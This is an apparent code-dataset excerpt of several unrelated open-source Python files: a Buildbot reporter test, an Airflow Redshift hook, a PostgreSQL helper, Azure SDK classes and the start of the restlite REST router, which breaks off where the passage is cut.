Dataset schema (one record per source file):
  text       string   (length 6 - 947k)
  repo_name  string   (length 5 - 100)
  path       string   (length 4 - 231)
  language   class    (1 value)
  license    class    (15 values)
  size       int64    (6 - 947k)
  score      float64  (0 - 0.34)
# This file is part of Buildbot. Buildbot is free software: you can # redistribute it and/or modify it under the terms of the GNU General Public # License as published by the Free Software Foundation, version 2. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., 51 # Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # # Copyright Buildbot Team Members import textwrap from twisted.internet import defer from twisted.trial import unittest from buildbot.process.results import FAILURE from buildbot.process.results import RETRY from buildbot.process.results import SUCCESS from buildbot.reporters import utils from buildbot.test import fakedb from buildbot.test.fake import fakemaster from buildbot.test.util import logging from buildbot.test.util.misc import TestReactorMixin class TestDataUtils(TestReactorMixin, unittest.TestCase, logging.LoggingMixin): LOGCONTENT = textwrap.dedent("""\ line zero line 1 """) def setUp(self): self.setUpTestReactor() self.master = fakemaster.make_master(self, wantData=True, wantDb=True, wantMq=True) def setupDb(self): self.db = self.master.db self.db.insertTestData([ fakedb.Master(id=92), fakedb.Worker(id=13, name='wrk'), fakedb.Buildset(id=98, results=SUCCESS, reason="testReason1"), fakedb.Builder(id=80, name='Builder1'), fakedb.BuildRequest(id=9, buildsetid=97, builderid=80), fakedb.BuildRequest(id=10, buildsetid=97, builderid=80), fakedb.BuildRequest(id=11, buildsetid=98, builderid=80), fakedb.BuildRequest(id=12, buildsetid=98, builderid=80), fakedb.Build(id=18, number=0, builderid=80, buildrequestid=9, workerid=13, masterid=92, results=FAILURE), fakedb.Build(id=19, number=1, builderid=80, buildrequestid=10, workerid=13, masterid=92, results=RETRY), fakedb.Build(id=20, number=2, builderid=80, buildrequestid=11, workerid=13, masterid=92, results=SUCCESS), fakedb.Build(id=21, number=3, builderid=80, buildrequestid=12, workerid=13, masterid=92, results=SUCCESS), fakedb.BuildsetSourceStamp(buildsetid=98, sourcestampid=234), fakedb.SourceStamp(id=234), fakedb.Change(changeid=13, branch='trunk', revision='9283', author='me@foo', repository='svn://...', codebase='cbsvn', project='world-domination', sourcestampid=234), fakedb.Patch(id=99, patch_base64='aGVsbG8sIHdvcmxk', patch_author='him@foo', patch_comment='foo', subdir='/foo', patchlevel=3), fakedb.SourceStamp(id=235, patchid=99), ]) for _id in (20, 21): self.db.insertTestData([ fakedb.BuildProperty( buildid=_id, name="workername", value="wrk"), fakedb.BuildProperty( buildid=_id, name="reason", value="because"), fakedb.BuildProperty( buildid=_id, name="owner", value="him"), fakedb.Step(id=100 + _id, buildid=_id, name="step1"), fakedb.Step(id=200 + _id, buildid=_id, name="step2"), fakedb.Log(id=60 + _id, stepid=100 + _id, name='stdio', slug='stdio', type='s', num_lines=2), fakedb.LogChunk(logid=60 + _id, first_line=0, last_line=1, compressed=0, content=self.LOGCONTENT), ]) @defer.inlineCallbacks def getChangesForBuild(buildid): assert buildid == 20 ch = yield self.master.db.changes.getChange(13) return [ch] self.master.db.changes.getChangesForBuild = getChangesForBuild @defer.inlineCallbacks def test_getDetailsForBuildset(self): self.setupDb() res = yield 
utils.getDetailsForBuildset(self.master, 98, wantProperties=True, wantSteps=True, wantPreviousBuild=True) self.assertEqual(len(res['builds']), 2) build1 = res['builds'][0] build2 = res['builds'][1] buildset = res['buildset'] self.assertEqual(build1['properties'], {'reason': ('because', 'fakedb'), 'owner': ('him', 'fakedb'), 'workername': ('wrk', 'fakedb')}) self.assertEqual(len(build1['steps']), 2) self.assertEqual(build1['buildid'], 20) self.assertEqual(build2['buildid'], 21) self.assertEqual(buildset['bsid'], 98) # make sure prev_build was computed self.assertEqual(build1['prev_build']['buildid'], 18) self.assertEqual(build2['prev_build']['buildid'], 20) @defer.inlineCallbacks def test_getDetailsForBuildsetWithLogs(self): self.setupDb() res = yield utils.getDetailsForBuildset(self.master, 98, wantProperties=True, wantSteps=True, wantPreviousBuild=True, wantLogs=True) build1 = res['builds'][0] self.assertEqual( build1['steps'][0]['logs'][0]['content']['content'], self.LOGCONTENT) @defer.inlineCallbacks def test_getResponsibleUsers(self): self.setupDb() res = yield utils.getResponsibleUsersForSourceStamp(self.master, 234) self.assertEqual(res, ["me@foo"]) @defer.inlineCallbacks def test_getResponsibleUsersFromPatch(self): self.setupDb() res = yield utils.getResponsibleUsersForSourceStamp(self.master, 235) self.assertEqual(res, ["him@foo"]) @defer.inlineCallbacks def test_getResponsibleUsersForBuild(self): self.setupDb() res = yield utils.getResponsibleUsersForBuild(self.master, 20) self.assertEqual(sorted(res), sorted(["me@foo", "him"])) @defer.inlineCallbacks def test_getResponsibleUsersForBuildWithBadOwner(self): self.setUpLogging() self.setupDb() self.db.insertTestData([ fakedb.BuildProperty( buildid=20, name="owner", value=["him"]), ]) res = yield utils.getResponsibleUsersForBuild(self.master, 20) self.assertLogged("Please report a bug") self.assertEqual(sorted(res), sorted(["me@foo", "him"])) @defer.inlineCallbacks def test_getResponsibleUsersForBuildWithOwners(self): self.setupDb() self.db.insertTestData([ fakedb.BuildProperty( buildid=20, name="owners", value=["him", "her"]), ]) res = yield utils.getResponsibleUsersForBuild(self.master, 20) self.assertEqual(sorted(res), sorted(["me@foo", "him", "her"])) @defer.inlineCallbacks def test_getPreviousBuild(self): self.setupDb() build = yield self.master.data.get(("builds", 21)) res = yield utils.getPreviousBuild(self.master, build) self.assertEqual(res['buildid'], 20) @defer.inlineCallbacks def test_getPreviousBuildWithRetry(self): self.setupDb() build = yield self.master.data.get(("builds", 20)) res = yield utils.getPreviousBuild(self.master, build) self.assertEqual(res['buildid'], 18) class TestURLUtils(TestReactorMixin, unittest.TestCase): def setUp(self): self.setUpTestReactor() self.master = fakemaster.make_master(self) def test_UrlForBuild(self): self.assertEqual(utils.getURLForBuild(self.master, 1, 3), 'http://localhost:8080/#builders/1/builds/3')
repo_name: anish/buildbot | path: master/buildbot/test/unit/test_reporters_utils.py | language: Python | license: gpl-2.0 | size: 8,181 | score: 0.001834
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from airflow.contrib.hooks.aws_hook import AwsHook


class RedshiftHook(AwsHook):
    """
    Interact with AWS Redshift, using the boto3 library
    """

    def get_conn(self):
        return self.get_client_type('redshift')

    # TODO: Wrap create_cluster_snapshot

    def cluster_status(self, cluster_identifier):
        """
        Return status of a cluster

        :param cluster_identifier: unique identifier of a cluster
        :type cluster_identifier: str
        """
        conn = self.get_conn()
        try:
            response = conn.describe_clusters(
                ClusterIdentifier=cluster_identifier)['Clusters']
            return response[0]['ClusterStatus'] if response else None
        except conn.exceptions.ClusterNotFoundFault:
            return 'cluster_not_found'

    def delete_cluster(
            self,
            cluster_identifier,
            skip_final_cluster_snapshot=True,
            final_cluster_snapshot_identifier=''):
        """
        Delete a cluster and optionally create a snapshot

        :param cluster_identifier: unique identifier of a cluster
        :type cluster_identifier: str
        :param skip_final_cluster_snapshot: determines cluster snapshot creation
        :type skip_final_cluster_snapshot: bool
        :param final_cluster_snapshot_identifier: name of final cluster snapshot
        :type final_cluster_snapshot_identifier: str
        """
        response = self.get_conn().delete_cluster(
            ClusterIdentifier=cluster_identifier,
            SkipFinalClusterSnapshot=skip_final_cluster_snapshot,
            FinalClusterSnapshotIdentifier=final_cluster_snapshot_identifier
        )
        return response['Cluster'] if response['Cluster'] else None

    def describe_cluster_snapshots(self, cluster_identifier):
        """
        Gets a list of snapshots for a cluster

        :param cluster_identifier: unique identifier of a cluster
        :type cluster_identifier: str
        """
        response = self.get_conn().describe_cluster_snapshots(
            ClusterIdentifier=cluster_identifier
        )
        if 'Snapshots' not in response:
            return None
        snapshots = response['Snapshots']
        snapshots = filter(lambda x: x['Status'], snapshots)
        snapshots.sort(key=lambda x: x['SnapshotCreateTime'], reverse=True)
        return snapshots

    def restore_from_cluster_snapshot(self, cluster_identifier, snapshot_identifier):
        """
        Restores a cluster from its snapshot

        :param cluster_identifier: unique identifier of a cluster
        :type cluster_identifier: str
        :param snapshot_identifier: unique identifier for a snapshot of a cluster
        :type snapshot_identifier: str
        """
        response = self.get_conn().restore_from_cluster_snapshot(
            ClusterIdentifier=cluster_identifier,
            SnapshotIdentifier=snapshot_identifier
        )
        return response['Cluster'] if response['Cluster'] else None

    def create_cluster_snapshot(self, snapshot_identifier, cluster_identifier):
        """
        Creates a snapshot of a cluster

        :param snapshot_identifier: unique identifier for a snapshot of a cluster
        :type snapshot_identifier: str
        :param cluster_identifier: unique identifier of a cluster
        :type cluster_identifier: str
        """
        response = self.get_conn().create_cluster_snapshot(
            SnapshotIdentifier=snapshot_identifier,
            ClusterIdentifier=cluster_identifier,
        )
        return response['Snapshot'] if response['Snapshot'] else None
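A minimal usage sketch for the RedshiftHook above, assuming an Airflow installation where this contrib hook is importable; the connection id and cluster identifier are illustrative placeholders, not values taken from the repository:

# Hypothetical example: query a cluster's status via the hook above.
# 'aws_default' and 'example-cluster' are placeholders.
from airflow.contrib.hooks.redshift_hook import RedshiftHook

hook = RedshiftHook(aws_conn_id='aws_default')
status = hook.cluster_status('example-cluster')
if status == 'cluster_not_found':
    print('No such cluster')
else:
    print('Cluster status:', status)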
repo_name: zack3241/incubator-airflow | path: airflow/contrib/hooks/redshift_hook.py | language: Python | license: apache-2.0 | size: 4,181 | score: 0.001196
import asyncio
import time
import psycopg2
import psycopg2.pool
import os
import sys


class Database:

    def __init__(self):
        loop = asyncio.get_event_loop()
        loop.run_until_complete(self.init_connection())

    @asyncio.coroutine
    def init_connection(self):
        result = 1
        loop_end = time.time() + 10
        while time.time() < loop_end:
            try:
                self.pool = psycopg2.pool.ThreadedConnectionPool(
                    1, 20,
                    host=os.getenv('DBHOST', 'localhost'),
                    port=os.getenv('DBPORT', '5432'),
                    user=os.getenv('DBUSER', 'stop'),
                    database=os.getenv('DBNAME', 'stop'),
                    password=os.getenv('DBPASS', 'stop'))
                result = 0
                break
            except:
                continue
        if result:
            print("Initializing a database connection failed")
            sys.exit()

    def get_connection(self):
        return self.pool.getconn()

    def put_connection(self, conn):
        self.pool.putconn(conn)

    def store_request(self, trip_id, stop_id, device_id, push_notification):
        conn = self.get_connection()
        cur = conn.cursor()
        if device_id == '0':
            values = (trip_id, stop_id, device_id, True)
        else:
            values = (trip_id, stop_id, device_id, not push_notification)
        sql = "INSERT INTO request (trip_id, stop_id, user_id, device_id, pushed, req_time, canceled) VALUES (%s, %s, 'user', %s, %s, now(), false) RETURNING id"
        cur.execute(sql, values)
        request_id = cur.fetchone()[0]
        conn.commit()
        self.put_connection(conn)
        return request_id

    def get_request_info(self, request_id):
        conn = self.get_connection()
        cur = conn.cursor()
        values = (request_id,)
        sql = "SELECT trip_id, stop_id FROM request WHERE id = %s"
        cur.execute(sql, values)
        result = cur.fetchone()
        self.put_connection(conn)
        return result

    def cancel_request(self, request_id):
        conn = self.get_connection()
        cur = conn.cursor()
        values = (request_id,)
        sql = "UPDATE request SET canceled = true, cancel_time = now() WHERE id = %s RETURNING trip_id"
        cur.execute(sql, values)
        trip_id = cur.fetchone()[0]
        conn.commit()
        self.put_connection(conn)
        return trip_id

    def get_requests(self, trip_id):
        conn = self.get_connection()
        cur = conn.cursor()
        values = (trip_id,)
        sql = "SELECT stop_id FROM request WHERE canceled = false AND trip_id = %s"
        cur.execute(sql, values)
        result = cur.fetchall()
        self.put_connection(conn)
        return result

    def store_report(self, trip_id, stop_id):
        conn = self.get_connection()
        cur = conn.cursor()
        values = (trip_id, stop_id)
        sql = "INSERT INTO report (trip_id, stop_id, user_id, report_time) VALUES (%s, %s, 'user', now())"
        cur.execute(sql, values)
        conn.commit()
        self.put_connection(conn)

    def get_unpushed_requests(self):
        conn = self.get_connection()
        cur = conn.cursor()
        sql = "SELECT trip_id,id,stop_id,device_id FROM request WHERE canceled = false AND pushed = false"
        cur.execute(sql)
        result = cur.fetchall()
        self.put_connection(conn)
        return result

    def set_pushed(self, ids):
        conn = self.get_connection()
        cur = conn.cursor()
        values = (tuple(ids),)
        sql = "UPDATE request SET pushed = true WHERE id IN %s"
        cur.execute(sql, values)
        conn.commit()
        self.put_connection(conn)

    def add_vehicle(self, vehicle_id, trip_id):
        conn = self.get_connection()
        cur = conn.cursor()
        values = (vehicle_id, trip_id)
        sql = "INSERT INTO vehicle (vehicle_id, trip_id) VALUES (%s, %s)"
        cur.execute(sql, values)
        conn.commit()
        self.put_connection(conn)

    def remove_vehicle(self, vehicle_id, trip_id):
        conn = self.get_connection()
        cur = conn.cursor()
        values = (vehicle_id, trip_id)
        sql = "DELETE FROM vehicle WHERE vehicle_id = %s AND trip_id = %s"
        cur.execute(sql, values)
        conn.commit()
        self.put_connection(conn)

    def get_vehicles(self):
        conn = self.get_connection()
        cur = conn.cursor()
        sql = "SELECT trip_id FROM vehicle"
        cur.execute(sql)
        result = cur.fetchall()
        self.put_connection(conn)
        return result
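A short, hypothetical usage sketch of the Database class above; it assumes a reachable PostgreSQL instance configured through the DBHOST/DBPORT/DBUSER/DBNAME/DBPASS environment variables, and the trip, stop and device identifiers are placeholders:

# Hypothetical usage of the connection-pooled Database wrapper above.
# Identifiers are illustrative; the project's "request" table must exist.
db = Database()

request_id = db.store_request(trip_id='1001_20170101', stop_id='2201',
                              device_id='device-42', push_notification=True)
print(db.get_request_info(request_id))   # (trip_id, stop_id) row, or None
print(db.get_requests('1001_20170101'))  # non-canceled stop requests for the trip
db.cancel_request(request_id)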
repo_name: STOP2/stop2.0-backend | path: src/db.py | language: Python | license: mit | size: 4,799 | score: 0.004168
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- import functools from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar import warnings from azure.core.async_paging import AsyncItemPaged, AsyncList from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import AsyncHttpResponse from azure.core.rest import HttpRequest from azure.core.tracing.decorator import distributed_trace from azure.core.tracing.decorator_async import distributed_trace_async from azure.mgmt.core.exceptions import ARMErrorFormat from ... import models as _models from ..._vendor import _convert_request from ...operations._subscriptions_operations import build_check_zone_peers_request, build_get_request, build_list_locations_request, build_list_request T = TypeVar('T') ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] class SubscriptionsOperations: """SubscriptionsOperations async operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~azure.mgmt.resource.subscriptions.v2018_06_01.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = _models def __init__(self, client, config, serializer, deserializer) -> None: self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config @distributed_trace def list_locations( self, subscription_id: str, **kwargs: Any ) -> AsyncIterable["_models.LocationListResult"]: """Gets all available geo-locations. This operation provides all the locations that are available for resource providers; however, each resource provider may support a subset of this list. :param subscription_id: The ID of the target subscription. 
:type subscription_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either LocationListResult or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.subscriptions.v2018_06_01.models.LocationListResult] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.LocationListResult"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) def prepare_request(next_link=None): if not next_link: request = build_list_locations_request( subscription_id=subscription_id, template_url=self.list_locations.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: request = build_list_locations_request( subscription_id=subscription_id, template_url=next_link, ) request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request async def extract_data(pipeline_response): deserialized = self._deserialize("LocationListResult", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_locations.metadata = {'url': '/subscriptions/{subscriptionId}/locations'} # type: ignore @distributed_trace_async async def get( self, subscription_id: str, **kwargs: Any ) -> "_models.Subscription": """Gets details about a specified subscription. :param subscription_id: The ID of the target subscription. :type subscription_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: Subscription, or the result of cls(response) :rtype: ~azure.mgmt.resource.subscriptions.v2018_06_01.models.Subscription :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.Subscription"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) request = build_get_request( subscription_id=subscription_id, template_url=self.get.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) deserialized = self._deserialize('Subscription', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get.metadata = {'url': '/subscriptions/{subscriptionId}'} # type: ignore @distributed_trace def list( self, **kwargs: Any ) -> AsyncIterable["_models.SubscriptionListResult"]: """Gets all subscriptions for a tenant. 
:keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either SubscriptionListResult or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.subscriptions.v2018_06_01.models.SubscriptionListResult] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.SubscriptionListResult"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) def prepare_request(next_link=None): if not next_link: request = build_list_request( template_url=self.list.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: request = build_list_request( template_url=next_link, ) request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request async def extract_data(pipeline_response): deserialized = self._deserialize("SubscriptionListResult", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list.metadata = {'url': '/subscriptions'} # type: ignore @distributed_trace_async async def check_zone_peers( self, subscription_id: str, parameters: "_models.CheckZonePeersRequest", **kwargs: Any ) -> "_models.CheckZonePeersResult": """Compares a subscriptions logical zone mapping. :param subscription_id: The ID of the target subscription. :type subscription_id: str :param parameters: Parameters for checking zone peers. 
:type parameters: ~azure.mgmt.resource.subscriptions.v2018_06_01.models.CheckZonePeersRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: CheckZonePeersResult, or the result of cls(response) :rtype: ~azure.mgmt.resource.subscriptions.v2018_06_01.models.CheckZonePeersResult :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.CheckZonePeersResult"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop('content_type', "application/json") # type: Optional[str] _json = self._serialize.body(parameters, 'CheckZonePeersRequest') request = build_check_zone_peers_request( subscription_id=subscription_id, content_type=content_type, json=_json, template_url=self.check_zone_peers.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('CheckZonePeersResult', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized check_zone_peers.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Resources/checkZonePeers/'} # type: ignore
repo_name: Azure/azure-sdk-for-python | path: sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/v2018_06_01/aio/operations/_subscriptions_operations.py | language: Python | license: mit | size: 12,046 | score: 0.004649
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class ClusterUpgradeDescriptionObject(Model): """Represents a ServiceFabric cluster upgrade. :param config_version: The cluster configuration version (specified in the cluster manifest). :type config_version: str :param code_version: The ServiceFabric code version of the cluster. :type code_version: str :param upgrade_kind: The kind of upgrade out of the following possible values. Possible values include: 'Invalid', 'Rolling'. Default value: "Rolling" . :type upgrade_kind: str or ~azure.servicefabric.models.UpgradeKind :param rolling_upgrade_mode: The mode used to monitor health during a rolling upgrade. Possible values include: 'Invalid', 'UnmonitoredAuto', 'UnmonitoredManual', 'Monitored'. Default value: "UnmonitoredAuto" . :type rolling_upgrade_mode: str or ~azure.servicefabric.models.UpgradeMode :param upgrade_replica_set_check_timeout_in_seconds: The maximum amount of time to block processing of an upgrade domain and prevent loss of availability when there are unexpected issues. When this timeout expires, processing of the upgrade domain will proceed regardless of availability loss issues. The timeout is reset at the start of each upgrade domain. Valid values are between 0 and 42949672925 inclusive. (unsigned 32-bit integer). :type upgrade_replica_set_check_timeout_in_seconds: long :param force_restart: If true, then processes are forcefully restarted during upgrade even when the code version has not changed (the upgrade only changes configuration or data). :type force_restart: bool :param enable_delta_health_evaluation: When true, enables delta health evaluation rather than absolute health evaluation after completion of each upgrade domain. :type enable_delta_health_evaluation: bool :param monitoring_policy: Describes the parameters for monitoring an upgrade in Monitored mode. :type monitoring_policy: ~azure.servicefabric.models.MonitoringPolicyDescription :param cluster_health_policy: Defines a health policy used to evaluate the health of the cluster or of a cluster node. :type cluster_health_policy: ~azure.servicefabric.models.ClusterHealthPolicy :param cluster_upgrade_health_policy: Defines a health policy used to evaluate the health of the cluster during a cluster upgrade. :type cluster_upgrade_health_policy: ~azure.servicefabric.models.ClusterUpgradeHealthPolicyObject :param application_health_policy_map: Defines a map that contains specific application health policies for different applications. Each entry specifies as key the application name and as value an ApplicationHealthPolicy used to evaluate the application health. If an application is not specified in the map, the application health evaluation uses the ApplicationHealthPolicy found in its application manifest or the default application health policy (if no health policy is defined in the manifest). The map is empty by default. 
:type application_health_policy_map: list[~azure.servicefabric.models.ApplicationHealthPolicyMapItem] """ _attribute_map = { 'config_version': {'key': 'ConfigVersion', 'type': 'str'}, 'code_version': {'key': 'CodeVersion', 'type': 'str'}, 'upgrade_kind': {'key': 'UpgradeKind', 'type': 'str'}, 'rolling_upgrade_mode': {'key': 'RollingUpgradeMode', 'type': 'str'}, 'upgrade_replica_set_check_timeout_in_seconds': {'key': 'UpgradeReplicaSetCheckTimeoutInSeconds', 'type': 'long'}, 'force_restart': {'key': 'ForceRestart', 'type': 'bool'}, 'enable_delta_health_evaluation': {'key': 'EnableDeltaHealthEvaluation', 'type': 'bool'}, 'monitoring_policy': {'key': 'MonitoringPolicy', 'type': 'MonitoringPolicyDescription'}, 'cluster_health_policy': {'key': 'ClusterHealthPolicy', 'type': 'ClusterHealthPolicy'}, 'cluster_upgrade_health_policy': {'key': 'ClusterUpgradeHealthPolicy', 'type': 'ClusterUpgradeHealthPolicyObject'}, 'application_health_policy_map': {'key': 'ApplicationHealthPolicyMap', 'type': '[ApplicationHealthPolicyMapItem]'}, } def __init__(self, config_version=None, code_version=None, upgrade_kind="Rolling", rolling_upgrade_mode="UnmonitoredAuto", upgrade_replica_set_check_timeout_in_seconds=None, force_restart=None, enable_delta_health_evaluation=None, monitoring_policy=None, cluster_health_policy=None, cluster_upgrade_health_policy=None, application_health_policy_map=None): super(ClusterUpgradeDescriptionObject, self).__init__() self.config_version = config_version self.code_version = code_version self.upgrade_kind = upgrade_kind self.rolling_upgrade_mode = rolling_upgrade_mode self.upgrade_replica_set_check_timeout_in_seconds = upgrade_replica_set_check_timeout_in_seconds self.force_restart = force_restart self.enable_delta_health_evaluation = enable_delta_health_evaluation self.monitoring_policy = monitoring_policy self.cluster_health_policy = cluster_health_policy self.cluster_upgrade_health_policy = cluster_upgrade_health_policy self.application_health_policy_map = application_health_policy_map
repo_name: lmazuel/azure-sdk-for-python | path: azure-servicefabric/azure/servicefabric/models/cluster_upgrade_description_object.py | language: Python | license: mit | size: 5,840 | score: 0.00137
''' restlite: REST + Python + JSON + XML + SQLite + authentication. http://code.google.com/p/restlite Copyright (c) 2009, Kundan Singh, kundan10@gmail.com. All rights reserved. License: released under LGPL (Lesser GNU Public License). This light-weight module allows quick prototyping of web services using the RESTful architecture and allows easy integration with sqlite3 database, and JSON and XML representation format. The approach is to provide all the appropriate tools which you can use to build your own application, instead of providing a intrusive framework. Features: 1. Very lightweight module in pure Python and no other dependencies hence ideal for quick prototyping. 2. Two levels of API: one is not intrusive (for low level WSGI) and other is intrusive (for high level @resource). 3. High level API can conveniently use sqlite3 database for resource storage. 4. Common list and tuple-based representation that is converted to JSON and/or XML. 5. Supports pure REST as well as allows browser and Flash Player access (with GET, POST only). 6. Integrates unit testing using doctest module. 7. Handles HTTP cookies and authentication. Dependencies: Python 2.6. ''' from wsgiref.util import setup_testing_defaults from xml.dom import minidom import re, sys, sqlite3, Cookie, base64, hashlib, time, traceback try: import json except: print 'Cannot import json. Please use Python 2.6.'; raise _debug = False defaultType = 'application/json' # default content type if ACCEPT is */*. Used in represent and router. #------------------------------------------------------------------------------ # REST router #------------------------------------------------------------------------------ def router(routes): '''This is the main low level REST router function that takes a list of routes and sequentially tries to match the request method and URL pattern. If a valid route is matched, request transformation is applied. If an application is specified for a route, then the (wsgiref) application is invoked and the response is returned. This is used together with wsgiref.make_server to launch a RESTful service. Your can use the routes to do several things: identify the response type (JSON, XML) from the URL, identify some parts in the URL as variables available to your application handler, modify some HTTP header or message body based on the URL, convert a GET or POST URL from the browser with URL suffix of /put or /delete to PUT or DELETE URL to handle these commands from the browser, etc. For more details see the project web page. >>> def files_handler(env, start_response): ... return '<files><type>' + env['ACCEPT'] + '</type><file>somefile.txt</file></files>' >>> routes = [ ... (r'GET,PUT,POST /xml/(?P<path>.*)$', 'GET,PUT,POST /%(path)s', 'ACCEPT=text/xml'), ... 
(r'GET /files$', files_handler) ] >>> r = router(routes) # create the router using these routes >>> # and test using the following code >>> env, start_response = {'REQUEST_METHOD': 'GET', 'PATH_INFO': '/xml/files', 'SCRIPT_NAME': '', 'QUERY_STRING': ''}, lambda x,y: (x, y) >>> print r(env, start_response) <files><type>text/xml</type><file>somefile.txt</file></files> ''' if isinstance(routes, dict) or hasattr(routes, 'items'): routes = routes.iteritems() def handler(env, start_response): import logging setup_testing_defaults(env) if 'wsgiorg.routing_args' not in env: env['wsgiorg.routing_args'] = dict() env['COOKIE'] = Cookie.SimpleCookie() if 'HTTP_COOKIE' in env: env['COOKIE'].load(env['HTTP_COOKIE']) if not 'QUERY_STRING' in env: env['QUERY_STRING']= None for route in routes: method, pattern = route[0].split(' ', 1) methods = method.split(',') if env['REQUEST_METHOD'] not in methods: continue path = env['PATH_INFO'] + ('?' + env['QUERY_STRING'] if env['QUERY_STRING'] else '') match = re.match(pattern, path) if match: app = None if callable(route[-1]): route, app = route[:-1], route[-1] # found the app if len(route) > 1: new_methods, path = route[1].split(' ', 1) env['REQUEST_METHOD'] = new_methods.split(',')[methods.index(env['REQUEST_METHOD'])] env['PATH_INFO'], ignore, env['QUERY_STRING'] = (path % match.groupdict()).partition('?') #@UnusedVariable for name, value in [x.split('=', 1) for x in route[2:]]: env[name] = value % match.groupdict() env['wsgiorg.routing_args'].update(match.groupdict()) if app is not None: matching = match.group(0) env['PATH_INFO'], env['SCRIPT_NAME'] = env['PATH_INFO'][len(matching):], env['SCRIPT_NAME'] + env['PATH_INFO'][:len(matching)] def my_response(status, headers): if 'RESPONSE_HEADERS' not in env: env['RESPONSE_STATUS'], env['RESPONSE_HEADERS'] = status, headers try: response = app(env, my_response) except Status: response, env['RESPONSE_STATUS'] = None, str(sys.exc_info()[1]) except Exception, e: logging.getLogger("platane.restlite").error(e) print traceback.format_exc() response, env['RESPONSE_STATUS'] = [traceback.format_exc()], '500 Internal Server Error' if response 